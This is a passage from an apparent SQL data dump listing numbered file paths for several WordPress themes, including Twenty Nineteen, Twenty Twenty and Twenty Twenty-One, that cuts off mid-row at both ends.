tent/themes/skt-pathway/archive.php'),(5113,'wp-content/themes/skt-pathway/category.php'),(5114,'wp-content/themes/skt-pathway/change_log.txt'),(5115,'wp-content/themes/skt-pathway/comments.php'),(5116,'wp-content/themes/skt-pathway/content-home.php'),(5117,'wp-content/themes/skt-pathway/content-page.php'),(5118,'wp-content/themes/skt-pathway/content-single.php'),(5119,'wp-content/themes/skt-pathway/content.php'),(5120,'wp-content/themes/skt-pathway/css/computer.css'),(5121,'wp-content/themes/skt-pathway/css/customizer.css'),(5122,'wp-content/themes/skt-pathway/css/ie.css'),(5123,'wp-content/themes/skt-pathway/css/mobile.css'),(5124,'wp-content/themes/skt-pathway/css/mobile_hz.css'),(5125,'wp-content/themes/skt-pathway/css/navigation.css'),(5126,'wp-content/themes/skt-pathway/css/nivo-slider.css'),(5127,'wp-content/themes/skt-pathway/css/style_base.css'),(5128,'wp-content/themes/skt-pathway/css/tablet.css'),(5129,'wp-content/themes/skt-pathway/editor-style.css'),(5130,'wp-content/themes/skt-pathway/footer.php'),(5131,'wp-content/themes/skt-pathway/front-page.php'),(5132,'wp-content/themes/skt-pathway/full-width.php'),(5133,'wp-content/themes/skt-pathway/functions.php'),(5134,'wp-content/themes/skt-pathway/header.php'),(5135,'wp-content/themes/skt-pathway/image.php'),(5136,'wp-content/themes/skt-pathway/images/arrows.png'),(5137,'wp-content/themes/skt-pathway/images/bq_bubble.png'),(5138,'wp-content/themes/skt-pathway/images/bull_right.png'),(5139,'wp-content/themes/skt-pathway/images/bullets.png'),(5140,'wp-content/themes/skt-pathway/images/bx_loader.gif'),(5141,'wp-content/themes/skt-pathway/images/favicon.ico'),(5142,'wp-content/themes/skt-pathway/images/free-vs-pro.png'),(5143,'wp-content/themes/skt-pathway/images/h1_buy_bg.png'),(5144,'wp-content/themes/skt-pathway/images/hr.png'),(5145,'wp-content/themes/skt-pathway/images/hr_double.png'),(5146,'wp-content/themes/skt-pathway/images/hr_footer.png'),(5147,'wp-content/themes/skt-pathway/images/img_404.png'),(5148,'wp-content/themes/skt-pathway/images/loading.gif'),(5149,'wp-content/themes/skt-pathway/images/logo.png'),(5150,'wp-content/themes/skt-pathway/images/mobile_nav_right.png'),(5151,'wp-content/themes/skt-pathway/images/search-icon.png'),(5152,'wp-content/themes/skt-pathway/images/separator.png'),(5153,'wp-content/themes/skt-pathway/images/sktskill.jpg'),(5154,'wp-content/themes/skt-pathway/images/slides/slide1.jpg'),(5155,'wp-content/themes/skt-pathway/images/slides/slide2.jpg'),(5156,'wp-content/themes/skt-pathway/images/slides/slide3.jpg'),(5157,'wp-content/themes/skt-pathway/images/transparent_black.png'),(5158,'wp-content/themes/skt-pathway/inc/about-themes.php'),(5159,'wp-content/themes/skt-pathway/inc/custom-functions.php'),(5160,'wp-content/themes/skt-pathway/inc/custom-header.php'),(5161,'wp-content/themes/skt-pathway/inc/customizer.php'),(5162,'wp-content/themes/skt-pathway/inc/extras.php'),(5163,'wp-content/themes/skt-pathway/inc/jetpack.php'),(5164,'wp-content/themes/skt-pathway/inc/template-tags.php'),(5165,'wp-content/themes/skt-pathway/index.php'),(5166,'wp-content/themes/skt-pathway/js/custom-customize.js'),(5167,'wp-content/themes/skt-pathway/js/custom.js'),(5168,'wp-content/themes/skt-pathway/js/customizer.js'),(5169,'wp-content/themes/skt-pathway/js/html5.js'),(5170,'wp-content/themes/skt-pathway/js/jquery.nivo.slider.js'),(5171,'wp-content/themes/skt-pathway/left-sidebar.php'),(5172,'wp-content/themes/skt-pathway/license.txt'),(5173,'wp-content/themes/skt-pathway/no-results.php'),(5174,'wp-content/themes/skt-pathway/no-sidebar.php'),(5175,'wp-content/themes/skt-pathway/page.php'),(5176,'wp-content/themes/skt-pathway/readme.txt'),(5177,'wp-content/themes/skt-pathway/screenshot.png'),(5178,'wp-content/themes/skt-pathway/search.php'),(5179,'wp-content/themes/skt-pathway/searchform.php'),(5180,'wp-content/themes/skt-pathway/sidebar.php'),(5181,'wp-content/themes/skt-pathway/single.php'),(5182,'wp-content/themes/skt-pathway/style.css'),(5183,'wp-content/themes/skt-pathway/woocommerce.php'),(5184,'wp-content/themes/the-best/404.php'),(5185,'wp-content/themes/the-best/LICENSE'),(5186,'wp-content/themes/the-best/archive.php'),(5187,'wp-content/themes/the-best/comments.php'),(5188,'wp-content/themes/the-best/footer.php'),(5189,'wp-content/themes/the-best/functions.php'),(5190,'wp-content/themes/the-best/genericons/COPYING.txt'),(5191,'wp-content/themes/the-best/genericons/Genericons.eot'),(5192,'wp-content/themes/the-best/genericons/Genericons.svg'),(5193,'wp-content/themes/the-best/genericons/Genericons.ttf'),(5194,'wp-content/themes/the-best/genericons/Genericons.woff'),(5195,'wp-content/themes/the-best/genericons/LICENSE.txt'),(5196,'wp-content/themes/the-best/genericons/README.md'),(5197,'wp-content/themes/the-best/genericons/genericons.css'),(5198,'wp-content/themes/the-best/header.php'),(5199,'wp-content/themes/the-best/images/header2.jpg'),(5200,'wp-content/themes/the-best/images/transperant1.png'),(5201,'wp-content/themes/the-best/inc/custom-header.php'),(5202,'wp-content/themes/the-best/inc/customizer.php'),(5203,'wp-content/themes/the-best/inc/extras.php'),(5204,'wp-content/themes/the-best/inc/jetpack.php'),(5205,'wp-content/themes/the-best/inc/template-tags.php'),(5206,'wp-content/themes/the-best/index.php'),(5207,'wp-content/themes/the-best/js/customizer.js'),(5208,'wp-content/themes/the-best/js/modernizr.custom.46884.js'),(5209,'wp-content/themes/the-best/js/modernizr.custom.46884.min.js'),(5210,'wp-content/themes/the-best/js/skip-link-focus-fix.js'),(5211,'wp-content/themes/the-best/js/utilities.js'),(5212,'wp-content/themes/the-best/page.php'),(5213,'wp-content/themes/the-best/readme.txt'),(5214,'wp-content/themes/the-best/screenshot.png'),(5215,'wp-content/themes/the-best/search.php'),(5216,'wp-content/themes/the-best/sidebar.php'),(5217,'wp-content/themes/the-best/single.php'),(5218,'wp-content/themes/the-best/style.css'),(5219,'wp-content/themes/the-best/template-parts/content-none.php'),(5220,'wp-content/themes/the-best/template-parts/content-page.php'),(5221,'wp-content/themes/the-best/template-parts/content-search.php'),(5222,'wp-content/themes/the-best/template-parts/content.php'),(5223,'wp-content/themes/twentynineteen/404.php'),(5224,'wp-content/themes/twentynineteen/archive.php'),(5225,'wp-content/themes/twentynineteen/classes/class-twentynineteen-svg-icons.php'),(5226,'wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php'),(5227,'wp-content/themes/twentynineteen/comments.php'),(5228,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff'),(5229,'wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff2'),(5230,'wp-content/themes/twentynineteen/footer.php'),(5231,'wp-content/themes/twentynineteen/functions.php'),(5232,'wp-content/themes/twentynineteen/header.php'),(5233,'wp-content/themes/twentynineteen/image.php'),(5234,'wp-content/themes/twentynineteen/images/pattern_01.jpg'),(5235,'wp-content/themes/twentynineteen/images/pattern_02.jpg'),(5236,'wp-content/themes/twentynineteen/images/pattern_03.jpg'),(5237,'wp-content/themes/twentynineteen/images/pattern_04.jpg'),(5238,'wp-content/themes/twentynineteen/inc/back-compat.php'),(5239,'wp-content/themes/twentynineteen/inc/block-patterns.php'),(5240,'wp-content/themes/twentynineteen/inc/color-patterns.php'),(5241,'wp-content/themes/twentynineteen/inc/customizer.php'),(5242,'wp-content/themes/twentynineteen/inc/helper-functions.php'),(5243,'wp-content/themes/twentynineteen/inc/icon-functions.php'),(5244,'wp-content/themes/twentynineteen/inc/template-functions.php'),(5245,'wp-content/themes/twentynineteen/inc/template-tags.php'),(5246,'wp-content/themes/twentynineteen/index.php'),(5247,'wp-content/themes/twentynineteen/js/customize-controls.js'),(5248,'wp-content/themes/twentynineteen/js/customize-preview.js'),(5249,'wp-content/themes/twentynineteen/js/priority-menu.js'),(5250,'wp-content/themes/twentynineteen/js/skip-link-focus-fix.js'),(5251,'wp-content/themes/twentynineteen/js/touch-keyboard-navigation.js'),(5252,'wp-content/themes/twentynineteen/package-lock.json'),(5253,'wp-content/themes/twentynineteen/package.json'),(5254,'wp-content/themes/twentynineteen/page.php'),(5255,'wp-content/themes/twentynineteen/postcss.config.js'),(5256,'wp-content/themes/twentynineteen/print.css'),(5257,'wp-content/themes/twentynineteen/print.scss'),(5258,'wp-content/themes/twentynineteen/readme.txt'),(5259,'wp-content/themes/twentynineteen/sass/_normalize.scss'),(5260,'wp-content/themes/twentynineteen/sass/blocks/_blocks.scss'),(5261,'wp-content/themes/twentynineteen/sass/elements/_elements.scss'),(5262,'wp-content/themes/twentynineteen/sass/elements/_lists.scss'),(5263,'wp-content/themes/twentynineteen/sass/elements/_tables.scss'),(5264,'wp-content/themes/twentynineteen/sass/forms/_buttons.scss'),(5265,'wp-content/themes/twentynineteen/sass/forms/_fields.scss'),(5266,'wp-content/themes/twentynineteen/sass/forms/_forms.scss'),(5267,'wp-content/themes/twentynineteen/sass/layout/_layout.scss'),(5268,'wp-content/themes/twentynineteen/sass/media/_captions.scss'),(5269,'wp-content/themes/twentynineteen/sass/media/_galleries.scss'),(5270,'wp-content/themes/twentynineteen/sass/media/_media.scss'),(5271,'wp-content/themes/twentynineteen/sass/mixins/_mixins-master.scss'),(5272,'wp-content/themes/twentynineteen/sass/mixins/_utilities.scss'),(5273,'wp-content/themes/twentynineteen/sass/modules/_accessibility.scss'),(5274,'wp-content/themes/twentynineteen/sass/modules/_alignments.scss'),(5275,'wp-content/themes/twentynineteen/sass/modules/_clearings.scss'),(5276,'wp-content/themes/twentynineteen/sass/navigation/_links.scss'),(5277,'wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss'),(5278,'wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss'),(5279,'wp-content/themes/twentynineteen/sass/navigation/_menu-social-navigation.scss'),(5280,'wp-content/themes/twentynineteen/sass/navigation/_navigation.scss'),(5281,'wp-content/themes/twentynineteen/sass/navigation/_next-previous.scss'),(5282,'wp-content/themes/twentynineteen/sass/site/_site.scss'),(5283,'wp-content/themes/twentynineteen/sass/site/footer/_site-footer.scss'),(5284,'wp-content/themes/twentynineteen/sass/site/header/_site-featured-image.scss'),(5285,'wp-content/themes/twentynineteen/sass/site/header/_site-header.scss'),(5286,'wp-content/themes/twentynineteen/sass/site/primary/_archives.scss'),(5287,'wp-content/themes/twentynineteen/sass/site/primary/_comments.scss'),(5288,'wp-content/themes/twentynineteen/sass/site/primary/_posts-and-pages.scss'),(5289,'wp-content/themes/twentynineteen/sass/site/secondary/_widgets.scss'),(5290,'wp-content/themes/twentynineteen/sass/typography/_copy.scss'),(5291,'wp-content/themes/twentynineteen/sass/typography/_headings.scss'),(5292,'wp-content/themes/twentynineteen/sass/typography/_typography.scss'),(5293,'wp-content/themes/twentynineteen/sass/variables-site/_colors.scss'),(5294,'wp-content/themes/twentynineteen/sass/variables-site/_columns.scss'),(5295,'wp-content/themes/twentynineteen/sass/variables-site/_fonts.scss'),(5296,'wp-content/themes/twentynineteen/sass/variables-site/_structure.scss'),(5297,'wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss'),(5298,'wp-content/themes/twentynineteen/sass/variables-site/_variables-site.scss'),(5299,'wp-content/themes/twentynineteen/screenshot.png'),(5300,'wp-content/themes/twentynineteen/search.php'),(5301,'wp-content/themes/twentynineteen/single.php'),(5302,'wp-content/themes/twentynineteen/style-editor-customizer.css'),(5303,'wp-content/themes/twentynineteen/style-editor-customizer.scss'),(5304,'wp-content/themes/twentynineteen/style-editor.css'),(5305,'wp-content/themes/twentynineteen/style-editor.scss'),(5306,'wp-content/themes/twentynineteen/style-rtl.css'),(5307,'wp-content/themes/twentynineteen/style.css'),(5308,'wp-content/themes/twentynineteen/style.scss'),(5309,'wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php'),(5310,'wp-content/themes/twentynineteen/template-parts/content/content-none.php'),(5311,'wp-content/themes/twentynineteen/template-parts/content/content-page.php'),(5312,'wp-content/themes/twentynineteen/template-parts/content/content-single.php'),(5313,'wp-content/themes/twentynineteen/template-parts/content/content.php'),(5314,'wp-content/themes/twentynineteen/template-parts/footer/footer-widgets.php'),(5315,'wp-content/themes/twentynineteen/template-parts/header/entry-header.php'),(5316,'wp-content/themes/twentynineteen/template-parts/header/site-branding.php'),(5317,'wp-content/themes/twentynineteen/template-parts/post/author-bio.php'),(5318,'wp-content/themes/twentynineteen/template-parts/post/discussion-meta.php'),(5319,'wp-content/themes/twentytwenty/.stylelintrc.json'),(5320,'wp-content/themes/twentytwenty/404.php'),(5321,'wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css'),(5322,'wp-content/themes/twentytwenty/assets/css/editor-style-block.css'),(5323,'wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css'),(5324,'wp-content/themes/twentytwenty/assets/css/editor-style-classic.css'),(5325,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2'),(5326,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2'),(5327,'wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png'),(5328,'wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png'),(5329,'wp-content/themes/twentytwenty/assets/images/2020-square-1.png'),(5330,'wp-content/themes/twentytwenty/assets/images/2020-square-2.png'),(5331,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png'),(5332,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png'),(5333,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png'),(5334,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png'),(5335,'wp-content/themes/twentytwenty/assets/js/color-calculations.js'),(5336,'wp-content/themes/twentytwenty/assets/js/customize-controls.js'),(5337,'wp-content/themes/twentytwenty/assets/js/customize-preview.js'),(5338,'wp-content/themes/twentytwenty/assets/js/customize.js'),(5339,'wp-content/themes/twentytwenty/assets/js/editor-script-block.js'),(5340,'wp-content/themes/twentytwenty/assets/js/index.js'),(5341,'wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js'),(5342,'wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php'),(5343,'wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php'),(5344,'wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php'),(5345,'wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php'),(5346,'wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php'),(5347,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php'),(5348,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php'),(5349,'wp-content/themes/twentytwenty/comments.php'),(5350,'wp-content/themes/twentytwenty/footer.php'),(5351,'wp-content/themes/twentytwenty/functions.php'),(5352,'wp-content/themes/twentytwenty/header.php'),(5353,'wp-content/themes/twentytwenty/inc/block-patterns.php'),(5354,'wp-content/themes/twentytwenty/inc/custom-css.php'),(5355,'wp-content/themes/twentytwenty/inc/starter-content.php'),(5356,'wp-content/themes/twentytwenty/inc/svg-icons.php'),(5357,'wp-content/themes/twentytwenty/inc/template-tags.php'),(5358,'wp-content/themes/twentytwenty/index.php'),(5359,'wp-content/themes/twentytwenty/package-lock.json'),(5360,'wp-content/themes/twentytwenty/package.json'),(5361,'wp-content/themes/twentytwenty/print.css'),(5362,'wp-content/themes/twentytwenty/readme.txt'),(5363,'wp-content/themes/twentytwenty/screenshot.png'),(5364,'wp-content/themes/twentytwenty/searchform.php'),(5365,'wp-content/themes/twentytwenty/singular.php'),(5366,'wp-content/themes/twentytwenty/style-rtl.css'),(5367,'wp-content/themes/twentytwenty/style.css'),(5368,'wp-content/themes/twentytwenty/template-parts/content-cover.php'),(5369,'wp-content/themes/twentytwenty/template-parts/content.php'),(5370,'wp-content/themes/twentytwenty/template-parts/entry-author-bio.php'),(5371,'wp-content/themes/twentytwenty/template-parts/entry-header.php'),(5372,'wp-content/themes/twentytwenty/template-parts/featured-image.php'),(5373,'wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php'),(5374,'wp-content/themes/twentytwenty/template-parts/modal-menu.php'),(5375,'wp-content/themes/twentytwenty/template-parts/modal-search.php'),(5376,'wp-content/themes/twentytwenty/template-parts/navigation.php'),(5377,'wp-content/themes/twentytwenty/template-parts/pagination.php'),(5378,'wp-content/themes/twentytwenty/templates/template-cover.php'),(5379,'wp-content/themes/twentytwenty/templates/template-full-width.php'),(5380,'wp-content/themes/twentytwentyone/.stylelintignore'),(5381,'wp-content/themes/twentytwentyone/.stylelintrc-css.json'),(5382,'wp-content/themes/twentytwentyone/.stylelintrc.json'),(5383,'wp-content/themes/twentytwentyone/404.php'),(5384,'wp-content/themes/twentytwentyone/archive.php'),(5385,'wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css'),(5386,'wp-content/themes/twentytwentyone/assets/css/ie-editor.css'),(5387,'wp-content/themes/twentytwentyone/assets/css/ie.css'),(5388,'wp-content/themes/twentytwentyone/assets/css/print.css'),(5389,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css'),(5390,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css'),(5391,'wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css'),(5392,'wp-content/themes/twentytwentyone/assets/css/style-editor.css'),(5393,'wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg'),(5394,'wp-content/themes/twentytwentyone/assets/images/Reading.jpg'),(5395,'wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg'),(5396,'wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg'),(5397,'wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg'),(5398,'wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg'),(5399,'wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg'),(5400,'wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg'),(5401,'wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg'),(5402,'wp-content/themes/twentytwentyone/assets/js/customize-helpers.js'),(5403,'wp-content/themes/twentytwentyone/assets/js/customize-preview.js'),(5404,'wp-content/themes/twentytwentyone/assets/js/customize.js'),(5405,'wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js'),(5406,'wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js'),(5407,'wp-content/themes/twentytwentyone/assets/js/editor.js'),(5408,'wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js'),(5409,'wp-content/themes/twentytwentyone/assets/js/polyfills.js'),(5410,'wp-content/themes/twentytwentyone/assets/js/primary-navigation.js'),(5411,'wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js'),(5412,'wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js'),(5413,'wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss'),(5414,'wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss'),(5415,'wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss'),(5416,'wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss'),(5417,'wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss'),(5418,'wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss'),(5419,'wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss'),(5420,'wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss'),(5421,'wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss'),(5422,'wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss'),(5423,'wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss'),(5424,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss'),(5425,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss'),(5426,'wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss'),(5427,'wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss'),(5428,'wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss'),(5429,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss'),(5430,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss'),(5431,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss'),(5432,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss'),(5433,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss'),(5434,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss'),(5435,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss'),(5436,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss'),(5437,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss'),(5438,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss'),(5439,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss'),(5440,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss'),(5441,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss'),(5442,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss'),(5443,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss'),(5444,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss'),(5445,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss'),(5446,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss'),(5447,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss'),(5448,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss'),(5449,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss'),(5450,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss'),(5451,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss'),(5452,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss'),(5453,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss'),(5454,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss'),(5455,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss'),(5456,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss'),(5457,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss'),(5458,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss'),(5459,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss'),(5460,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss'),(5461,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss'),(5462,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss'),(5463,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss'),(5464,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss'),(5465,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss'),(5466,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss'),(5467,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss'),(5468,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss'),(5469,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss'),(5470,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss'),(5471,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss'),(5472,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss'),(5473,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss'),(5474,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss'),(5475,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss'),(5476,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss'),(5477,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss'),(5478,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss'),(5479,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss'),(5480,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss'),(5481,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss'),(5482,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss'),(5483,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss'),(5484,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss'),(5485,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss'),(5486,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss'),(5487,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss'),(5488,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss'),(5489,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss'),(5490,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss'),(5491,'wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss'),(5492,'wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss'),(5493,'wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss'),(5494,'wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss'),(5495,'wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss'),(5496,'wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss'),(5497,'wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss'),(5498,'wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss'),(5499,'wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss'),(5500,'wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss'),(5501,'wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss'),(5502,'wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss'),(5503,'wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss'),(5504,'wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss'),(5505,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss'),(5506,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss'),(5507,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss'),(5508,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss'),(5509,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss'),(5510,'wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss'),(5511,'wp-content/themes/twentytwentyone/assets/sass/style-editor.scss'),(5512,'wp-content/themes/twentytwentyone/assets/sass/style.scss'),(5513,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php'),(5514,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php'),(5515,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php'),(5516,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php'),(5517,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php'),(5518,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php'),(5519,'wp-content/themes/twentytwentyone/comments.php'),(5520,'wp-content/themes/twentytwentyone/footer.php'),(5521,'wp-content/themes/twentytwentyone/functions.php'),(5522,'wp-content/themes/twentytwentyone/header.php'),(5523,'wp-content/themes/twentytwentyone/image.php'),(5524,'wp-content/themes/twentytwentyone/inc/back-compat.php'),(5525,'wp-content/themes/twentytwentyone/inc/block-patterns.php'),(5526,'wp-content/themes/twentytwentyone/inc/block-styles.php'),(5527,'wp-content/themes/twentytwentyone/inc/custom-css.php'),(5528,'wp-content/themes/twentytwentyone/inc/menu-functions.php'),(5529,'wp-content/themes/twentytwentyone/inc/starter-content.php'),(5530,'wp-content/themes/twentytwentyone/inc/template-functions.php'),(5531,'wp-content/themes/twentytwentyone/inc/template-tags.php'),(5532,'wp-content/themes/twentytwentyone/index.php'),(5533,'wp-content/themes/twentytwentyone/package-lock.json'),(5534,'wp-content/themes/twentytwentyone/package.json'),(5535,'wp-content/themes/twentytwentyone/page.php'),(5536,'wp-content/themes/twentytwentyone/postcss.config.js'),(5537,'wp-content/themes/twentytwentyone/readme.txt'),(5538,'wp-content/themes/twentytwentyone/screenshot.png'),(5539,'wp-content/themes/twentytwentyone/search.php'),(5540,'wp-content/themes/twentytwentyone/searchform.php'),(5541,'wp-content/themes/twentytwentyone/single.php'),(5542,'wp-content/themes/twentytwentyone/style-rtl.css'),(5543,'wp-content/themes/twentytwentyone/style.css'),(5544,'wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php'),(5545,'wp-content/themes/twentytwentyone/template-parts/content/content-none.php'),(5546,'wp-content/themes/twentytwentyone/template-parts/content/content-page.php'),(5547,'wp-content/themes/twentytwentyone/template-parts/content/content-single.php'),(5548,'wp-content/themes/twentytwentyone/template-parts/content/content.php'),(5549,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php'),(5550,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php'),(5551